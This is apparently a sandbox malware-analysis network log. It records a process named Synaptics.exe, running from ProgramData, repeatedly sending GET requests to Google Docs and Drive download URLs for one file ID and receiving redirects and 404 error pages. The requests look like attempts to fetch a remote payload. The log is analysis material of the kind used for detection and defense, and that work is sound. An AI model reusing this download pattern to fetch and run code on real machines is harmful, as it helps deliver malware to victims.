                                                                                                                                                                                    2024-12-30 10:52:13 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:13 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC620esF-uKQ9ROJwllc306WaBWmYJK6EDVE9xG9f9G-gxLQWxGjxhCAOm07RpOgrqkA4IF8w4k
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:13 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dopRXCngxMSUY5eB-oVMQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:13 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:52:13 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 5f 72 47 61 42 43 5f 37 73 72 41 4f 4b 65 36 32 63 6c 66 7a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="7_rGaBC_7srAOKe62clfzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:52:13 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    121192.168.2.452186142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:13 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:14 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4q2pP4cazBBrZgHE1dahT-fM5tYyBg3BDDg9UBD3Nbc7zyOOEseBCLRYg0K0oduvig
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:13 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-t3pyx11VOiAI5lJ-5-AZZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:14 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:14 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 52 46 48 4e 72 62 47 69 6e 56 35 79 71 50 54 6f 50 2d 78 4b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="7RFHNrbGinV5yqPToP-xKg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:14 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    122192.168.2.452187142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:13 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:13 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-JMUWqtyHVWIDaY2IVZfH3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    123192.168.2.452188142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:13 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:14 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-J0XI2ghpM-fJ3f3Sx4LMSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    124192.168.2.452189142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:14 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:14 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6Dc_mBqT-zgYrZhOoZMeb8yicPOvIMdzGayyutsu7ru2PyDAT_QC6lgO5pALfIF0R8
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:14 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-GpYxYobVnCy6LUApWCTmlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:14 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:14 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 6f 79 75 36 47 30 59 63 5f 6c 73 47 74 47 4f 57 70 74 47 6e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="ioyu6G0Yc_lsGtGOWptGnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:14 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    125192.168.2.452196142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:14 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    126192.168.2.452197142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:14 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    127192.168.2.452200142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:14 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    128192.168.2.452206142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:15 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:15 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Y4JZinCyqF59vVirnLAh8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
